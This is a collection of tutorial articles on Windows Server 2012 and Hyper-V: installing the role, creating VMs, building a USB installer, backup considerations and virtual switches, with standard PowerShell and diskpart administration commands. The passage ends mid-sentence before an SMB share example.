  • If your SAN supports ODX, you should strongly consider enabling ODX on your Hyper-V hosts, as well as on any VMs that connect directly to SAN storage LUNs.
To enable ODX, open PowerShell (using 'Run as Administrator') and type the following:

C:\> Set-ItemProperty hklm:\system\currentcontrolset\control\filesystem -Name "FilterSupportedFeaturesMode" -Value 0

Be sure to run this command on every Hyper-V host that connects to the SAN, as well as any VM that connects directly to the SAN.

This concludes our Windows 2012 Hyper-V Best Practices article. We hope you’ve found the information provided useful and that it helps make your everyday administration a much easier task.




The Importance of a Hyper-V & VMware Server Backup Tool - 20 Reasons Why You Should Use One

Using Hyper-V Server virtualization technology, you can virtualize your physical environment to reduce the cost of physical hardware. As part of IT best practices, you implement monitoring solutions to monitor the Hyper-V Servers and the virtual machines running on them, and you install antivirus software to secure the production environment. It then also becomes necessary to implement a backup mechanism, using a Hyper-V Server backup tool, so that business services can be restored as quickly as possible.

This article explains why it is important to choose a dedicated Hyper-V backup tool rather than relying on existing mechanisms, as outlined in the points below.

Users interested can also read our articles on Hyper-V Concepts/VDI, how to install Hyper-V Server & creating a Virtual Machine in Hyper-V.


1. Flexibility

Third-party backup products are designed in such a way that the product is easy to use when it comes to backup or restore a virtual machine running on the Hyper-V Server. For example, using third-party backup product, you can select a virtual machine to backup or restore. In case of any disaster with a virtual machine, it becomes easy for an IT administrator to use the flexible backup product’s console to restore a virtual machine from backup copies and restore the business services as quickly as possible.

2. Verification Of Restores

Third-party backup products provide features to verify restores without impacting the production workload. IT administrators can use the verification feature to restore the backup copies to a standalone environment to make sure these backup copies can be restored successfully in the future, if required.

3. Designed For Use With Hyper-V

A third-party backup product is designed for use with a specific technology. For example, SQL Server backup products are designed to back up and restore SQL Server databases. Similarly, third-party Hyper-V backup products are designed specifically for use with Hyper-V Servers. Since these dedicated Hyper-V backup products are closely integrated with Hyper-V, they are more trusted by IT organizations.

4. Full Backup Copy Of Virtual Machine

Starting with Windows Server 2012, Hyper-V offers replication services, referred to as Hyper-V Replica, which can be used to build a disaster recovery scenario. Replication takes place every 5 minutes, and changed data is replicated to the Hyper-V Servers located at the disaster recovery site. At the disaster site, you only have the changed copies with which to restore a virtual machine after a failure. What if you need to restore the full virtual machine? In that case, you would require a full backup copy of the virtual machine, which is only possible if you are using a dedicated Hyper-V backup product.

5. Maintaining Different Versions Of Backup Copies

There are several reasons to maintain different versions of backup copies. One reason is to revert a configuration to a point in time; another is to restore business services as quickly as possible from a backup copy of your choice. A dedicated Hyper-V backup product can maintain several backup copies of a virtual machine.

6. Agentless Backups/Restores

Most third-party Hyper-V backup products ship without an agent. An agent is a piece of software installed on a Hyper-V server which communicates with the backup software. With agentless backup software, it is easy for administrators to perform backup/restore operations without worrying about the agent's responsiveness.

7. Timely Backing up virtual machines

As part of the standard IT process, many organizations have a strategy in place in which backups for critical IT components, including virtual machines, are scheduled in a timely manner. These backups ensure that in case of any disaster (including physical), the service can be restored from a backup copy taken with a dedicated backup product rather than relying on native methods. The backup copy not only allows you to restore services but also helps you understand the impact of restoring an older backup copy.

8. Centralized Management

Backup software ships with a centralized management tool. The centralized management tool is capable of managing multiple Hyper-V Servers and checking the backup operations on multiple Hyper-V servers from a single console.

9. Avoid Unnecessary Files Backup

Since the backup software is designed to work with a specific technology, it is designed in such a way that it excludes the files which are not necessary to include in the virtual machine backup copies. This helps in reducing the backup copy size.

10. Compression

A dedicated Hyper-V backup product offers compression of backup data before it is written to the backup drive. You can enable/disable compression for all or selected virtual machines using the third-party backup product's console.

11. Encryption

Security is the major concern for IT organizations nowadays. Third-party Hyper-V Backup products use encryption technology to encrypt backup copies stored on a backup drive. These backup copies can only be read by the same Hyper-V backup product.

12. Backup & Offsite Location

As part of their IT processes, most organizations ensure that backup copies are kept at an off-site location and can be retrieved easily when disaster strikes the production site. Native tools do not support backing up to an off-site location. Third-party backup products can provide an off-site backup feature in which backup copies are saved to an off-site location without requiring much network bandwidth.

13. Incremental Backup Copies

A dedicated Hyper-V backup product ensures that only changed contents are backed up rather than taking a full backup copy every time the backup job runs.

14. More Backup Options

Third-party backup products provide more backup options like taking daily backups or monthly backups which can be scheduled at a pre-defined interval using the centralized management console.

15. Backup To External Sources

Third-party Hyper-V backup products support backing up virtual machines to external destinations including USB external devices, eSATA external drives, USB flash drives, file server network shares, NAS devices, and RDX cartridges.

16. Backup Retention Policies

Old backup copies can be deleted if they are not required. You can configure the backup retention policy for each virtual machine. A dedicated Hyper-V Backup product can take automatic actions to delete the older backup copies as per the retention policy you configure.

17. Ability To Restore Individual Files Or Folders

Without using a dedicated Hyper-V backup product, it would be difficult for IT administrators to restore individual files/folders from a virtual machine backup copy. Some backup products provide a feature called “Exchange Level Item Restore” which can be used to restore selected emails or mailboxes from a backup copy of a virtual machine.

18. Application Vendor Recommendation For Backup Products

Many application vendors require that an enterprise backup system be installed in the production environment to back up the data of their applications running in virtual machines. Since most vendors impose this requirement, or recommend backing up application data with a dedicated Hyper-V backup product, native backup tools often fall short of it.

19. Error & Reporting

Error handling and reporting are key features a third-party backup product provides. They let you take the necessary actions if a backup or restore operation fails. Using the reporting feature of a backup product, you can see how many virtual machines have been backed up successfully and how many have failed.

20. Support

If you are unable to restore a virtual machine from a backup copy, or you hit an error during a restore or backup operation, you can always contact product support to get you out of the situation. Many third-party backup products provide 24/7 support for their products.


Altaro Hyper-V Backup

Altaro Hyper-V Backup offers a simple, easy-to-use solution for backing up Hyper-V VMs. It includes features such as offsite backup, remote management, Exchange item-level Restore, Compression, Encryption, and much more at an affordable cost.


How to Install Windows Server 2012 from USB Flash – ISO Image

Most would remember the days when we had to have a CD-ROM or DVD-ROM in order to proceed with the installation of an operating system. Today, it is very common to install an operating system directly from an ISO image. When dealing with virtualized systems, it becomes pretty much a necessity.

This article will show how to install Windows Server 2012 (the same process can be used for almost all other operating systems) from a USB Flash.

The only prerequisites for this process to work are that you have a USB flash drive big enough to fit the ISO image and that the server (or virtualization platform) supports booting from USB. If these two requirements are met, then it's a pretty straight-forward process.
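
As a side note, readers who prefer not to use a dedicated tool can prepare the USB flash drive manually with diskpart and then copy the contents of the mounted ISO onto it. The sketch below is only an outline: the disk number is an example and the clean command destroys all data on the selected disk, so double-check it with list disk first. The rest of this article uses the Windows 7 USB/DVD Tool described below:

C:\> diskpart
DISKPART> list disk
DISKPART> select disk 1
DISKPART> clean
DISKPART> create partition primary
DISKPART> format fs=ntfs quick
DISKPART> active
DISKPART> assign
DISKPART> exit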


The Windows 7 USB-DVD Tool

The Windows 7 USB/DVD Tool is a freely distributed application available in our Administrator Utilities download section. The application is required to transfer/copy the ISO image of the operating system we want to install to our USB flash drive. The application is also able to burn the ISO image directly to a DVD, a very handy feature.

Download a copy, install and run it on the computer where the ISO image is available.

When the tool runs, browse to the path where the ISO image is located. Once selected, click on Next:

Installing Windows 2012 via USB Flash

At this point, we can choose to copy the image to our USB device (USB Flash) or directly on to a DVD. We select the USB Device option:


In the next screen, we are required to select the correct USB device. If more than one USB storage device is connected, extra care must be taken to ensure the correct USB flash drive is selected. If no USB flash drive has been connected yet, insert it now into your USB port and click the refresh button for it to appear:


After selecting the appropriate USB device, click on Begin Copying to start the transfer of files to the USB Flash:


Once the copy process is complete, we are ready to remove our USB Flash and connect it to our server:



This completes our article on how to install Windows Server 2012 from USB Flash device. We recommend users visit our Windows 2012 section and browse our growing database of high-quality Windows 2012 and Hyper-V Virtualization articles.


Creating a Virtual Machine in Windows Hyper-V. Configuring Virtual Disk, Virtual Switch, Integration Services and other Components

Our previous articles covered basic concepts of Virtualization along with the installation and monitoring of Windows 2012 Hyper-V. This article takes the next step, which is the installation of a guest host (Windows 8.1) on our Windows 2012 Hyper-V enabled server. The aim of this article is to show how easily a guest operating system can be installed and configured, while explaining the installation and setup process. Additional Windows 2012 Server and Hyper-V technical articles can be found in our Windows 2012 Server section.


Steps To Create A Virtual Machine In Hyper-V

To begin the creation of our first virtual machine, open the Hyper-V manager in Windows Server 2012. On the Actions pane located on the right side of the window, click New and select Virtual Machine:


 

Read the Before you begin page, which contains important information, and then click Next:

Windows Hyper-V Creating new VM

Type the name of the virtual machine and configure the location where its virtual hard disk will be stored. On server systems with shared storage devices, the virtual hard disk is best stored on the shared storage for performance and redundancy reasons; otherwise select a local hard disk drive. For the purpose of this lab, we will be using the server's local C drive:

Choose the generation of the virtual machine and click Next. Generation 2 is new with Server 2012 R2. If the guest operating system will be running Windows Server 2012 or 64-bit Windows 8 / 8.1, select Generation 2; otherwise select Generation 1:

Hyper-V Installing VM & Selecting VM Generation

The next step involves assigning the necessary amount of memory. Under Assign Memory, configure the memory and click Next. For the purpose of this lab, we will give our Windows 8.1 guest operating system 1 GB of memory:

Hyper-V Assigning Memory to VM

Under the Configure Networking tab, leave the default setting and click Next. You can create virtual switches later and re-configure the virtual machine settings as required:

Hyper-V Installing VM - Configuring VM Switch

Next, choose to create a virtual hard disk and specify the size. We allocated a 60 GB disk size for our Windows 8.1 installation. When ready, click Next:

Hyper-V Configuring Virtual Hard Disk

One of the great benefits of virtual machines is that we can proceed with the installation of the new operating system using an ISO image, rather than a CD/DVD.

Browse to the selected ISO image and click the Next button. The virtual machine will try to boot from the selected ISO disk when it starts, so it is important to ensure the ISO image is bootable:

Hyper-V Installing VM from ISO Image

The last step allows us to review the virtual machine’s configuration summary. When ready click the Finish button:

Hyper-V VM Summary Installation
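
For completeness, the same kind of virtual machine can be created from PowerShell with the Hyper-V module. This is a minimal sketch matching the values used above; the VM name, VHDX path and ISO path are examples, and for Generation 2 the boot order may still need adjusting in the VM's firmware settings:

# Create a Generation 2 VM with 1 GB of startup memory and a new 60 GB VHDX
PS C:\> New-VM -Name "Win81-VM" -Generation 2 -MemoryStartupBytes 1GB -NewVHDPath "C:\Hyper-V\Win81-VM.vhdx" -NewVHDSizeBytes 60GB
# Attach the installation ISO and start the VM
PS C:\> Add-VMDvdDrive -VMName "Win81-VM" -Path "C:\ISO\Windows81.iso"
PS C:\> Start-VM -Name "Win81-VM"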

Install Windows 8.1 Guest Operating System In Hyper-V Virtual Machine

With the configuration of our virtual machine complete, it’s time to power on our virtual machine and install the operating system. Open Hyper-V Manager, and under the Virtual Machines section double-click the virtual machine created earlier. Click on the start button from the Action Menu to power on the virtual machine:

Hyper-V Starting a VM Machine

After the virtual machine completes its startup process, press any key to boot from the Windows 8.1 disk (ISO media) we configured previously. The Windows 8 installation screen will appear in a couple of seconds. Click Next followed by the Install Now button to begin the installation of Windows operating system on the virtual machine:

Hyper-V Begin Windows 8 VM installation

After accepting the End User License Agreement (EULA) we can continue our post-installation setup by configuring the hard disk. Windows will then begin its installation and update the screen as it progresses. Finally, once the installation is complete, we are presented with the Personalization screen and finally, the Start Screen:

Hyper-V VM Windows8 Start Screen

After the operating system installation and configuration is complete, it is important to proceed with the installation of Integration Services.

Integration Services on Hyper-V is what VM Tools is for VMware. Integration Services will help significantly enhance the VM’s guest operating system performance, allow file copy from the host machine to the guest machine easily, time synchronization between host and guest machines, improve management of the VM by replacing the generic operating system drivers for the mouse, keyboard, video card, network and SCSI controller components.

Other services offered by Integration Services are:

  • Backup (Volume Snapshot)
  • Virtual Machine Connection Enhancements
  • Hyper-V Shutdown Service
  • Data Exchange

To proceed with the installation of Integration Services, go to the virtual machine's console, select Action, and click Insert Integration Services Setup Disk as shown below:

Hyper-V Host Integration Services installation

In the Upgrade Hyper-V Integration Services dialog box, click OK and, when prompted, click Yes to restart the virtual machine. Using the Hyper-V Manager console, administrators can keep track of all installed VMs along with their CPU usage, assigned memory and uptime:

Hyper-V Manager - VM Status


This completes our article covering the installation of a Virtual Machine within Hyper-V and setup of Integration Services. Additional Windows 2012 Server and Hyper-V technical articles can be found in our Windows 2012 Server section.

 


How to Install Windows 2012 Hyper-V via Server Manager & Windows PowerShell. Monitoring Hyper-V Virtual Machines

Our previous article covered the basic concepts of Virtualization and Windows Server 2012 Hyper-V.  This article takes a closer look at Microsoft’s Hyper-V Virtualization platform and continues with the installation of the Hyper-V role via the Windows Server Manager interface and Windows PowerShell command prompt.


Hyper-V is a server role used to create a virtualized environment by deploying different types of virtualization technologies such as server virtualization, network virtualization and desktop virtualization. The Hyper-V server role can be installed on the Server 2012 R2 Standard, Datacenter or Essentials edition. Hyper-V version 3.0 is the latest version of Hyper-V available in Windows Server 2012 R2. Additional Windows 2012 Server and Hyper-V technical articles can be found in our Windows 2012 Server section.

To learn more about the licensing restrictions on each Windows Server 2012 edition, read our article Windows 2012 Server Foundation, Essential, Standard & Datacenter Edition Differences, Licensing & Supported Features. 

Hyper-V Hardware Requirements

The Hyper-V server role has specific hardware requirements that must be met. The minimum requirements are listed in the table below:

Hardware | Minimum Requirements
Processor | 1.4 GHz 64-bit with hardware-assisted virtualization, available in processors that include a virtualization option - specifically Intel Virtualization Technology (Intel VT) or AMD Virtualization (AMD-V). Hardware-enforced Data Execution Prevention (DEP) must also be available and enabled - specifically the Intel XD bit (execute disable bit) or AMD NX bit (no execute bit).
Memory | 512 MB
Network Adapter | At least one Gigabit Ethernet adapter
Disk Space | 32 GB

Keep in mind that the above table specifies the minimum requirements. If you want to install Hyper-V in a production environment along with a number of virtual machines, you will definitely need more than 512MB of memory and 32GB of disk space.

Click here for Windows Server 2016 Hyper-V Requirements
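
Before attempting the installation, it is worth confirming that the server's CPU exposes the required virtualization and DEP extensions. On Windows Server 2012 the built-in systeminfo tool reports this in a "Hyper-V Requirements" section near the end of its output, so a quick check is simply:

C:\Users\Administrator> systeminfo

If the Hyper-V role is already installed, systeminfo instead reports that a hypervisor has been detected.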

Installing The Hyper-V Server Role In Server 2012 Using Server Manager

In Windows Server 2012, you can install the Hyper-V server role by using Server Manager (GUI) or Windows PowerShell. In both cases, the installation requires the user to be an Administrator or a member of the Administrators or Hyper-V Administrators group.

First, open Server Manager. Click Manage and select the Add Roles and Features option:

windows-2012-hyper-v-install-config-1
Add Roles and Features


Click Next on the Before you begin page.

Choose the Role-based or feature-based installation option and click the Next button:

windows-2012-hyper-v-install-config-2
 Choose Role-based or feature-based Installation

In the next window, click on Select a server from the server pool option and select the server where you would like to install the Hyper-V server role. Click on Next after selecting the server:

windows-2012-hyper-v-install-config-3
 Select the Destination Server to Install Hyper-V

The next screen lists the available roles for installation, check Hyper-V and click Next:

windows-2012-hyper-v-install-config-4
Selecting the Hyper-V Role for Installation

Read the Hyper-V role information and click the Next button:

windows-2012-hyper-v-install-config-5
Hyper-V Installation

The next step involves the creation of Virtual Switches. Choose your server’s physical network adapters that will take part in the virtualization:

windows-2012-hyper-v-install-config-6
Creating Your Virtual Switches

The selected physical network adapters (in case you have more than one available) will be used and shared by the virtual machines to communicate with the physical network. After selecting the appropriate network adapters, click Next to proceed to the Migration screen.

Under Migration, leave the default settings as is and click Next:

windows-2012-hyper-v-install-config-7
Leave Default Migration Settings

These settings can also be modified later on. Live Migration is similar to VMware’s vMotion, allowing the real-time migration of virtual machines to another physical host (server).

Under Default Stores, you can configure the location of hard disk files and configuration files of all virtual machines. This is a location where all the virtual machine data will reside. You can also configure a SMB shared folder (Windows network folder), local drive or even a shared storage device.

We will leave the settings to their default location and click the Next button.

windows-2012-hyper-v-install-config-8
Selecting a Location to Store the Virtual Machines

The final screen allows us to review our configuration and proceed with the installation by clicking on the Install button:

windows-2012-hyper-v-install-config-9
Hyper-V Installation Confirmation

 Windows will now immediately begin the installation of the Hyper-V role and continuously update the installation window as shown below.

windows-2012-hyper-v-install-config-10
Hyper-V Installation Progress

Once the installation of Hyper-V is complete, the Windows server will restart.

Installing Hyper-V Role Using Windows PowerShell

The second way to install the Hyper-V role is via Windows PowerShell. Surprisingly enough, the installation is initiated with a single command.

Type the following cmdlet in PowerShell to install the Hyper-V server role on your Windows Server 2012 system:

C:\Users\Administrator> Install-WindowsFeature -Name Hyper-V -IncludeManagementTools -Restart

windows-2012-hyper-v-install-config-11-large 
Hyper-V Installation with PowerShell   

To install the Hyper-V server role on a remote computer, include the -ComputerName switch.  In our example, the remote computer was named Voyager:

C:\Users\Administrator> Install-WindowsFeature -Name Hyper-V -ComputerName Voyager -IncludeManagementTools -Restart

Once the installation is complete, the server will restart. After the server has booted, you can open the Hyper-V Manager and begin creating virtual machines:

windows-2012-hyper-v-install-config-12
Hyper-V Manager
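
To confirm from PowerShell that the role is in place after the reboot, a quick check (a sketch run on the Hyper-V host itself) is:

C:\Users\Administrator> Get-WindowsFeature -Name Hyper-V

The Install State column should read Installed once the role has been added.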

Monitoring Of Hyper-V Virtual Machines

When working in a virtualization environment, it is extremely important to keep an eye on the virtualization services and ensure everything is running smoothly.

Thankfully, Microsoft provides an easy way to monitor Hyper-V elements and take action before things get to a critical stage.

The Hyper-V Manager console allows you to monitor the processor, memory, networking, storage and overall health of the Hyper-V server and its virtual machines, while additional Hyper-V monitoring metrics are accessible through Task Manager, Resource Monitor, Performance Monitor and Event Viewer.

The screenshot below shows the Hyper-V Manager with one virtual machine installed.  At first glance, we can view the VM’s state, CPU usage, assigned memory and uptime:

windows-2012-hyper-v-install-config-13-large
View Virtual Machine Status
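
The same status information is exposed to PowerShell, which is handy for scripting or for hosts managed remotely. As a minimal sketch, Get-VM lists every virtual machine along with its state, CPU usage, assigned memory and uptime:

C:\Users\Administrator> Get-VM

The default output includes the Name, State, CPUUsage(%), MemoryAssigned(M), Uptime and Status columns, mirroring what Hyper-V Manager displays.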

Under the Windows Event Viewer we’ll find a number of advanced logs that provide a deeper view of the various Hyper-V components, as shown below:

windows-2012-hyper-v-install-config-14
Hyper-V Events (click to enlarge)

Additional information on Hyper-V can be obtained through Windows Performance Monitor, which provides a number of useful Hyper-V counters, as shown below:

windows-2012-hyper-v-install-config-15
Hyper-V Performance Monitor
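
The same counters can be sampled from PowerShell with Get-Counter. The counter path below is one commonly available on Hyper-V hosts and is shown purely as a sketch:

# Sample the overall hypervisor logical processor load five times, two seconds apart
Get-Counter -Counter "\Hyper-V Hypervisor Logical Processor(_Total)\% Total Run Time" -SampleInterval 2 -MaxSamples 5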

Most experienced virtualization administrators will agree that managing and monitoring a virtualization environment can be a full-time job. It is very important to ensure your virtualization strategy is well planned and that VMs are hosted on servers with plenty of resources, such as physical CPUs, RAM and disk storage space, so they are not starved of these resources during periods of high utilization.


Keeping an eye on Hyper-V’s Manager, Performance Monitor counters and Event Viewer will help make sure no critical errors or problems go without notice.


Introduction To Windows Server 2012 R2 Virtualization - Understanding Hyper-V Concepts, Virtual Desktop Infrastructure (VDI) and more


Virtualization is an abstraction layer that creates separate, distinct virtual environments, allowing different operating systems, desktops and applications to run on the same or a combined pool of resources. In the past couple of years, virtualization has gained an incredible rate of adoption as companies consolidate their existing server and network infrastructure, in the hope of creating a more efficient infrastructure that can keep up with their growing needs while keeping running and administration costs as low as possible.

Our readers can visit our dedicated Windows Server 2012 Server section to read more on Windows Hyper-V Virtualization and Windows Server 2012 technical articles.

When we hear the word ‘virtualization’, most of us think of ‘server virtualization’, which is of course the most widely applied scenario; however, today the term virtualization also applies to a number of concepts including:

  • Server virtualization: - Server virtualization allows multiple operating systems to be installed on top of a single physical server.
  • Desktop virtualization: - Desktop virtualization allows the deployment of multiple instances of virtual desktops to users through the LAN or the Internet. Users can access virtual desktops using thin clients, laptops, or tablets.
  • Network virtualization: - Network virtualization, also known as Software Defined Networking (SDN), is a software version of network technologies such as switches, routers, and firewalls. The SDN makes the intelligent decisions while the physical networking device forwards the traffic.
  • Application virtualization: - Application virtualization allows an application to be streamed to many desktop users. Hosted application virtualization allows users to access, from their local computers, applications that are physically running on a server somewhere else on the network.

This article focuses on the server virtualization platform, which is currently the most active segment of the virtualization industry.  As noted previously, with server virtualization a physical machine is divided into many virtual servers, each with its own operating system.  The core element of server virtualization is the Hypervisor – a thin layer of software that sits between the hardware layer and the multiple operating systems (virtual servers) that run on the physical machine.

The Hypervisor provides the virtual CPUs, memory and other components, and intercepts the virtual servers’ requests to the hardware. Currently, there are two types of Hypervisors:

Type 1 Hypervisor – This is the type of hypervisor used for bare-metal servers. These hypervisors run directly on the physical server’s hardware and the operating systems run on top of it. Examples of Type-1 Hypervisors are Microsoft’s Hyper-V, VMware ESX, Citrix XenServer.

Type 2 Hypervisor – This is the type of hypervisor that runs on top of existing operating systems. Examples of Type-2 Hypervisors are VMware Workstation, SWSoft’s Parallels Desktop and others.


Microsoft Server Virtualization – Hyper-V Basics

Microsoft introduced its server virtualization platform Hyper-V with the release of Windows Server 2008. Hyper-V is a server role that can be installed from Server Manager or PowerShell in Windows Server 2012.

With the release of Windows Server 2012 and Windows Server 2012 R2, Microsoft has made a lot of improvements to its Hyper-V virtualization platform. Features like live migration, dynamic memory, network virtualization, RemoteFX, Hyper-V Replica, etc. have been added to the new Hyper-V 3.0 in Server 2012.

Hyper-V is a type 1 hypervisor that operates right above the hardware layer. The Windows Server 2012 operating system remains above the hypervisor layer, despite the fact that the Hyper-V role is installed from within the Windows Server operating system. The physical server where the hypervisor or Hyper-V server role is installed is called the host machine or virtualization server. Similarly, the virtual machines installed on Hyper-V are called guest machines.

Understanding Traditional vs Modern Server Deployment Models

Let’s take a look at the traditional way of server deployment. The figure below shows a typical traditional scenario where the one-server-per-application model is applied. In this deployment model, each application has its own dedicated physical server.

windows-hyper-v-concepts-vdi-1Traditional Server Deployment

This traditional model of server deployment has many disadvantages, such as increased setup costs, management and backup overhead, increased physical space and power requirements, plus many more. Resource utilization in this type of deployment is usually below 10%.  Practically, this means that we have five underutilized servers.

Virtualization dramatically changes the above scenario.

Using Microsoft’s Windows Server 2012 along with the Hyper-V role installed, our traditional server deployment model is transformed into a single physical server with a generous amount of resources (CPU, Memory, Storage space, etc) ready to undertake the load of all virtual servers.

The figure below shows how the traditional model of server deployment is now virtualized with Microsoft’s Hyper-V server:

windows-hyper-v-concepts-vdi-2Hyper-V Server Consolidation

As shown in the figure above, all five servers are now virtualized onto a single physical server. It is important to note that even though these virtual machines run on top of the same hardware platform, each virtual server is completely isolated from the other virtual machines.

There are many benefits of this type of virtualized server consolidation. A few important benefits are reduced management overhead, faster server deployment, efficient resource utilization, reduced power consumption and so on.

Network Virtualization With Hyper-V

With the power of network virtualization you can create a multi-tenant environment and assign virtual machines, or groups of virtual machines, to different organizations or different departments. In a traditional network, you would simply create different VLANs on physical switches to isolate them from the rest of the network(s). Likewise, in Hyper-V, you can create VLANs and virtual switches to isolate them from the network in the same way.

Readers can also refer to our VLAN section that analyses the concept of VLANs and their characteristics.

For example, you can configure one group of virtual machines on the 192.168.1.0/24 subnet and another group of virtual machines on the 192.168.2.0/24 subnet.

windows-hyper-v-concepts-vdi-3Hyper-V Networking

Each virtual machine can have more than one virtual network adapter assigned to it. Like regular physical network adapters, the virtual network adapters can be configured with IP addresses, MAC addresses, NIC teaming and so on. These virtual network adapters are connected to a virtual switch. A virtual switch is a software version of a physical switch, capable of forwarding traffic, handling VLAN traffic, and so on. The virtual switch is created from within the Hyper-V Manager and is then connected to one or more of the available physical network adapters of the host machine. The physical network adapters on the host machine are then connected to a physical switch on the network.

As shown in figure 1.3 above, three VLANs are created under the same virtual switch. The host is then connected to the physical switch, usually by combining multiple physical network cards into one interface, also called a LAG (Link Aggregation Group) or EtherChannel (Cisco’s implementation of LAG). A LAG or EtherChannel combines the speed of the physical network adapters; if, for example, we have two 1Gbps physical network cards, with the use of LAG or EtherChannel these are combined into a single 2Gbps link.
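
To illustrate the point, VLAN membership for a virtual machine's network adapter can be set from PowerShell on the Hyper-V host. The VM name and VLAN ID below are hypothetical, and this is only a sketch of the concept described above:

# Place the VM's virtual network adapter in access mode on VLAN 10 (hypothetical VM name and VLAN ID)
Set-VMNetworkAdapterVlan -VMName "WebServer01" -Access -VlanId 10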

Microsoft’s Hyper-V supports the creation of three different types of virtual switches, described below (a short PowerShell sketch follows the list):

  1. Internal: - The internal virtual switch allows communication between the virtual machines and the Hyper-V host (the physical hardware server), but it does not connect to the physical network infrastructure (e.g. switches).
  2. External: - The external virtual switch can communicate directly with the physical network infrastructure. This virtual switch is used for seamless communication between the virtual machines and the physical network.
  3. Private: - The private virtual switch allows communication only between the virtual machines on the same host. A common example is a cluster-based system where virtual servers communicate with each other over a dedicated network connection.
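
As a rough PowerShell sketch of the three switch types described above (the switch names and the physical adapter name "Ethernet" are hypothetical and should be adjusted to your environment):

# External switch bound to a physical adapter and shared with the management operating system
New-VMSwitch -Name "ExternalSwitch" -NetAdapterName "Ethernet" -AllowManagementOS $true

# Internal switch: virtual machines plus the Hyper-V host, no physical network connectivity
New-VMSwitch -Name "InternalSwitch" -SwitchType Internal

# Private switch: communication between virtual machines only
New-VMSwitch -Name "PrivateSwitch" -SwitchType Private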

Virtual Desktop Infrastructure (VDI) Deployment With Hyper-V

VDI is a new way of delivering desktops to end users. In VDI, virtual desktops are hosted centrally as virtual machines and are provided, or streamed, to users via the network or the Internet using the Remote Desktop Protocol (RDP) service. These virtual desktops can be accessed by users with different types of devices such as PCs, laptops, tablets, smartphones, thin clients, and so on. VDI has also helped fuel the Bring Your Own Device (BYOD) trend: with a BYOD policy implemented in the organization, users can bring their own devices, such as laptops and tablets, and the company delivers the required virtual desktop via the network infrastructure.

VDI is an upcoming trend that offers many advantages such as:

  • Central management and control
  • Lower cost, since desktop PCs are not needed; alternative devices such as thin clients are usually preferred
  • Lower power consumption, as tablets, thin clients and laptops require less power than traditional desktop or tower PCs
  • Faster desktop deployments
  • More efficient backup

VDI is fully supported and can be implemented in Windows Server 2012 by installing the Remote Desktop Services server role and configuring the virtualization host. You can create virtual machines running Windows XP/7/8 and easily assign the virtual machines to users.

We’ve covered a few of the important virtualization features deployable with Windows Server 2012 and Hyper-V that allow organizations to consolidate their server, network and desktop infrastructure into a more efficient model.

Our readers can visit our dedicated Windows Server 2012 Server section to read more on Windows Hyper-V Virtualization and Windows Server 2012 offerings.


New Features in Windows Server 2012 - Why Upgrade to Windows 2012

There is no doubt that cloud computing is a hot topic these days. Innovations in cloud computing models have made every industry, and company IT departments, re-think their traditional model of computing. Realizing the benefits and challenges of cloud computing, Microsoft has jumped into the game by releasing a cloud-optimized server operating system called Windows Server 2012.

Windows Server 2012 has dozens of new features and services that make it cloud ready. Windows Server 2012 R2 is the latest version of the server operating system from Microsoft and the successor of Server 2012. For more technical articles on Windows 2012 Server and Hyper-V Virtualization, visit our Windows 2012 Server section.

Let’s take a look at some of the new features Windows Server 2012 now supports:


Windows Server Manager

Server Manager is one of the major changes in Windows Server 2012. With the new ‘look and feel’ of the Server Manager user interface, administrators now have the option to group multiple servers on their network and manage them centrally – a useful feature that will save valuable time. With this grouping feature, monitoring events, services, installed roles and performance on multiple servers from a single window is easy, fast and requires very little effort.

windows-2012-features-1

Figure 1. Windows Server 2012 - Server Manager Dashboard (click to enlarge)

Similar to the Server Manager in previous versions of Windows Server, it can also be used in Windows Server 2012 to install server roles and features.

Windows PowerShell 3.0

PowerShell 3.0 is another important improvement in Windows Server 2012. PowerShell is a command-line and scripting tool designed to provide greater control of Windows servers. The graphical user interface (GUI) of Windows Server 2012 is built on top of PowerShell 3.0: when you click buttons in the GUI, PowerShell cmdlets and scripts are actually running in the background, ‘translating’ mouse clicks into executable commands and scripts.

PowerShell scripts allow more tasks to be executed faster and within a shorter period of time, and bypassing the GUI generally means fewer crashes and problems.

windows-2012-features-2Figure 2. Windows Server 2012 PowerShell

Hundreds of PowerShell cmdlets have been added to Windows Server 2012 and we expect a lot more to be added in the near future, expanding their functionality and providing a new faster and more stable way to administer a Windows Server 2012.
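
As a small illustration of PowerShell-driven administration (a sketch only), the one-liner below lists the roles and features currently installed on the server, something that would otherwise require browsing through Server Manager:

# Show only the roles and features that are currently installed
Get-WindowsFeature | Where-Object { $_.Installed }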

Hyper-V 3.0

Similar to VMware’s ESXi hypervisor, Hyper-V is Microsoft’s offering of a virtualization platform. This important feature allows many instances of virtual machines to run on a single physical Windows Server 2012 machine. Hyper-V features such as live migration, dynamic memory, network virtualization, RemoteFX, Hyper-V Replica, etc. have made the Hyper-V platform more competitive against the alternatives.

The screenshot below shows the Hyper-V Manager console:

windows-2012-features-3Figure 3. Windows Server 2012 - Hyper-V Manager (click to enlarge)

When combined with Microsoft’s System Center, Windows Hyper-V becomes much more powerful and a very competitive solution that can even support private or public clouds.

Hyper-V Replica

The Windows Server 2012 Hyper-V role introduces a new capability, Hyper-V Replica, a feature many administrators will welcome.

This new feature allows the asynchronous replication of selected VMs to a backup replica server. On the local LAN, this means you get a full backup copy of your VMs on another hardware server, while on a WAN scale it can be extended to back up VMs to a designated replica site across a WAN infrastructure; disaster recovery sites are a common example. The replication cycle has a minimum setting of 15 minutes between replications, which means the backup VM will be up to 15 minutes behind its source - the primary VM.

When enabled, Hyper-V Replica creates an initial copy of the whole virtual machine, which usually takes a considerable amount of time depending on the amount of data; from then on, only changes are replicated.
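
Replication of an individual VM can also be enabled from PowerShell once a replica server has been configured to accept replication traffic. The sketch below assumes a hypothetical VM named "FileServer01" and a hypothetical replica host "ReplicaHost01", using Kerberos authentication over HTTP port 80:

# Enable asynchronous replication of the VM to the designated replica server (hypothetical names)
Enable-VMReplication -VMName "FileServer01" -ReplicaServerName "ReplicaHost01" -ReplicaServerPort 80 -AuthenticationType Kerberos

# Start the initial copy of the virtual machine to the replica server
Start-VMInitialReplication -VMName "FileServer01"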

Server Message Block (SMB) 3.0

SMB is a file-sharing protocol used by Windows servers. In Windows Server 2012, SMB is now at version 3.0, with interesting new features such as support for deduplication, hot-pluggable interfaces, multichannel, encryption, Volume Shadow Copy Service (VSS) for shared files, and many more.

In addition, Hyper-V’s Virtual Hard Disk (VHD) files and virtual machines can also be hosted on shared folders. This allows the effective usage of shared folders, ensuring you make the most out of all available resources.
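
As a simple sketch of how such a shared folder could be created with the new SMB cmdlets (the share name, path and computer account below are hypothetical, and the folder is assumed to already exist):

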